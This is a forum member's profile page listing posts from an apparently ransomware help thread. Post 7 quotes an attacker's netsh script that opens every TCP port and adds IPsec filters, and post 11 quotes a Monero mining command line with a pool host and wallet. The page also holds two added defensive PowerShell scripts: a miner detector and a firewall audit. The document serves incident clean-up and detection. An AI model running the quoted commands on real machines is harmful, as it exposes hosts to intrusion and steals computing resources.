ganymede

Member
  • Content Count: 17
  • Joined
  • Last visited
  • Days Won: 2

ganymede last won the day on May 16 2017

ganymede had the most liked content!

Community Reputation: 3 Neutral

About ganymede
  • Rank: Member

  1. Sounds like some sort of syndicate. Ransomware-as-a-service? Could you explain that a little more? When you say anyone can get their own ransomware, do you mean get the app/whatever that initiates the encryption on other machines?
  2. Never mind, apparently it works in Windows 7 at least. Didn't accept my .onion files as being compatible though. :/
  3. I double click the exe inside and nothing happens. That was disappointing...
  4. People need to understand that this forum is hosted by Emsisoft, a company selling anti-malware tools etc. They cannot endorse anything as a solution to this ransomware other than their software (or perhaps some other application from a digitally verified source), if for no other reason than corporate liability. No offense to anyone here trying to help, but if you want to "go rogue", I suggest starting a thread on Bleeping Computer. Knowledge sharing is always welcome though. Sounds to me like the folks here have done all they can with the info at hand. All we can do now is wait and hope people stop paying the ransom so the criminals get bored or something and leak info.
  5. People are unofficially calling it Cry36, not to be confused with Cry128. You may want to ask Emsisoft folks to see if they have a name for it though.
  6. So you think they blocked port 445 so that our systems wouldn't be infected with WannaCry? We must have been the "expeditionary front" of the WannaCry plague to test it out before launching it en masse.
  7. @NnitehawkK-fb, thanks for posting that. It's a script that the hacker ran to open up a bunch of vulnerabilities on your machine, so now I know where to look to plug all the holes. For example, go to the command prompt and type `netsh ipsec static show all` and likely there will be a bunch of filters and whatnot listed that you'll want to remove. Another place you'll want to go to remove stuff is in the Windows Firewall with Advanced Security snap-in to take out the tcp-all rule et al. Here're the commands cleaned up:
     C:\WINDOWS\system32>ping 127.0.0.1 -n 10
     C:\WINDOWS\system32>net1 user IISUSER$ /del & net1 user IUSR_Servs /del
     C:\WINDOWS\system32>sc config MpsSvc start= auto & net start MpsSvc
     C:\WINDOWS\system32>netsh advfirewall set allprofiles state on
     C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
     C:\WINDOWS\system32>netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
     C:\WINDOWS\system32>netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow
     C:\WINDOWS\system32>netsh ipsec static add policy name=win
     C:\WINDOWS\system32>netsh ipsec static add filterlist name=Allowlist
     C:\WINDOWS\system32>netsh ipsec static add filterlist name=denylist
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
     C:\WINDOWS\system32>netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
     C:\WINDOWS\system32>netsh ipsec static add filteraction name=Allow action=permit
     Something curious -- why would they want to deny inbound port 445? Seems like that would be a precautionary thing.
  8. Most commonly it's been brute force entry via Remote Desktop, though I've been hearing in the news lately that Office 365 and some other feature Windows comes with were also points of entry. I can't remember the name of the other thing off the top of my head but apparently it was a serious enough vulnerability that Microsoft released updates for old OSes as far back as XP.
  9. Ahh this was the company I reached out to as well. They quoted me ~$1900 for 5-7 day service. I opted not to pursue in the hopes that Emsi will come out with something in the near future, but if I need the data sooner, it's good to know now that they're a sure thing. Thanks for the info.
  10. Just an opinion here, but the folks at Emsisoft are doing what they can to provide a FREE service to restore people's files, and for that no one has any reasonable ground on which to complain. I too have wondered as to their status, but with updates like Sarah's, I know that it's not being ignored. How much could they possibly share on a topic that most would likely not understand? For my own situation, I have reached out to a specialist recovery service, and they claim to be able to restore my files for ~$2000, but I am waiting for the folks at Emsisoft because I'm confident they'll come up with something in a reasonable amount of time. And also because no matter the cost to my company, I refuse to negotiate with terrorists. Meanwhile I have been redoing lost work as needed. All in all, still probably less cost than the $2k being quoted. If Fabian and the rest of Emsisoft's brain trust can fix this, you better believe I'm buying their product!
  11. I think this guy might have the actual executable. On a different note, I'm not sure why but I forgot to mention in my original post that I found the service registry of the virus in my Windows logs: winlogon.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 48Nk7Q5oB5gEVLabrgo3KhLbaTSDKvZNHBECoHyZcxWNDMgfDnHA8Ue2Skp7A6z2ZGG93wmLxxrKa1j4QR7kmi866AP1G8t -p x Workstationt C:\Windows Maybe that long nonsense string has something to do with the key?
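The log entry quoted in post 11 has the shape of a command-line mining client invocation (`-a` algorithm, `-o` pool URL, `-u` wallet address, `-p` password; `stratum+tcp://` is the pool protocol scheme such clients use). Below is an added PowerShell example, not from ganymede's post or from Emsisoft, that scores command lines by those markers so a defender can pick similar entries out of the event log. The sample lines, the pool host and the wallet string are constructed placeholders, not the values from the post; the closing Get-WinEvent call is optional and reads service-installation events (System log, ID 7045) on the local host.

```powershell
# Added example (not from the forum post): flag command lines that look like a
# stratum mining client, as in the service entry quoted in post 11.

# Each pattern is one marker of a mining client command line.
$indicators = @(
    'stratum\+(tcp|ssl)://',      # pool URL scheme
    '-a\s+cryptonight',           # algorithm switch seen in the post
    '\s-o\s+\S+:\d+',             # -o host:port
    '\s-u\s+[0-9A-Za-z]{90,}'     # -u followed by a long wallet-style address
)

function Test-MinerCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    # @() keeps Count at 0 when nothing matches (a bare $null would count as 1).
    $hits = @($indicators | Where-Object { $CommandLine -match $_ })
    [pscustomobject]@{
        Suspicious  = ($hits.Count -ge 2)   # require two markers to keep noise down
        Indicators  = $hits
        CommandLine = $CommandLine
    }
}

# Constructed sample lines. The wallet string is a placeholder of the right shape
# (95 alphanumeric characters); the pool host is a reserved .invalid name.
$placeholderWallet = '4PLACEHOLDERWALLETADDRESS' + ('x' * 70)
$samples = @(
    "winlogon.exe -a cryptonight -o stratum+tcp://pool.example.invalid:443 -u $placeholderWallet -p x",
    'C:\Windows\System32\winlogon.exe',
    'C:\Program Files\App\updater.exe -o https://updates.example.invalid:443'
)
$samples | ForEach-Object { Test-MinerCommandLine $_ } |
    Format-Table Suspicious, Indicators, CommandLine -AutoSize

# Optional live check: service installations recorded on this host.
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045 } -ErrorAction SilentlyContinue |
    ForEach-Object { Test-MinerCommandLine $_.Message } |
    Where-Object Suspicious
```

Only the first sample scores as suspicious: the updater line hits the `-o host:port` marker alone, which is exactly why the function asks for two markers before flagging anything. The binary name is not used as a marker on purpose; the post shows the miner installed under the name winlogon.exe, while the real winlogon.exe lives in C:\Windows\System32 and is never started with arguments like these, so the path and arguments tell the story better than the file name does.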
  12. George, I'm not sure those bytes are meant to be constant. My last 4 in each file are 35 F6 5C 01. Also to Kenneth and mclaugb, you may have different variants than the one being discussed here, as your extensions end in .onion._. Those were linked to Cry128. Have you tried using the decrypter for it?
  13. Confirmed. Also, and this is probably a "duh, obviously" thing to mention, but check your Windows firewall with advanced security, inbound rules. I was in there whitelisting my RDP ports and noticed that the *&^%$! opened up all ports for tcp connections.
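Posts 7 and 13 both describe the same clean-up by hand: open Windows Firewall with Advanced Security, look for an inbound rule that allows every TCP port, and run `netsh ipsec static show all` for leftover IPsec objects. The script below is an added PowerShell example that is not part of ganymede's posts or anything from Emsisoft; it automates that audit. It assumes Windows 8 / Server 2012 or later for the NetSecurity cmdlets and an elevated prompt, and it uses the rule, policy and filter-list names from the script quoted in post 7 as indicators. The removal step is a `-WhatIf` dry run.

```powershell
# Added example (not from the forum posts): audit the Windows Firewall and the
# legacy 'netsh ipsec static' store for the changes described in posts 7 and 13.
# Assumes an elevated PowerShell on Windows 8 / Server 2012 or newer.

# Names used by the script quoted in post 7. Names can be changed by whoever
# adds a rule, so the port-based check in step 1 matters more than this list.
$suspectRuleNames = @('tcp all', 'tcpall', 'deny tcp 445')

# 1. Any enabled inbound allow rule that covers every TCP port, whatever its name.
$wideOpen = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
    Where-Object {
        $pf = $_ | Get-NetFirewallPortFilter
        ($pf.Protocol -eq 'TCP') -and
        (($pf.LocalPort -contains 'Any') -or ($pf.LocalPort -contains '0-65535'))
    }

# 2. Rules in either direction that carry the names from the posted script.
$byName = Get-NetFirewallRule | Where-Object { $suspectRuleNames -contains $_.DisplayName }

# 3. The IPsec static store is not covered by the NetSecurity cmdlets, so read it
#    the same way post 7 does and look for the policy and filter-list names.
$ipsecHits = (netsh ipsec static show all) |
    Select-String -Pattern '\b(win|Allowlist|denylist)\b'

'Inbound allow-all TCP rules:'
$wideOpen | Format-Table DisplayName, Profile, Enabled -AutoSize
'Rules matching names from the posted script:'
$byName | Format-Table DisplayName, Direction, Action -AutoSize
'IPsec static objects matching the posted names:'
$ipsecHits | ForEach-Object { $_.Line.Trim() }

# Remediation as a dry run: review the list, then drop -WhatIf to delete.
# The IPsec objects are removed separately with:
#   netsh ipsec static delete policy name=win
#   netsh ipsec static delete filterlist name=Allowlist
#   netsh ipsec static delete filterlist name=denylist
@($wideOpen) + @($byName) |
    Sort-Object -Property InstanceID -Unique |
    Remove-NetFirewallRule -WhatIf
```

Step 1 is the one to keep even after this incident is over: an inbound allow rule for TCP 0-65535 is worth a look no matter who created it or what it is called, and checking on port scope rather than on display name is what catches a renamed copy of the same rule.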
  14. Yeah, I noticed that some of my picture files (jpg & png) were renamed yet unencrypted too. I wasn't sure if it had to do with the extension or if maybe the virus renamed everything first and then went to encrypting. I would love to try renaming my files back en masse, but I literally have millions of files and I don't want to rename the ones that are actually encrypted because the decrypter won't recognize them then.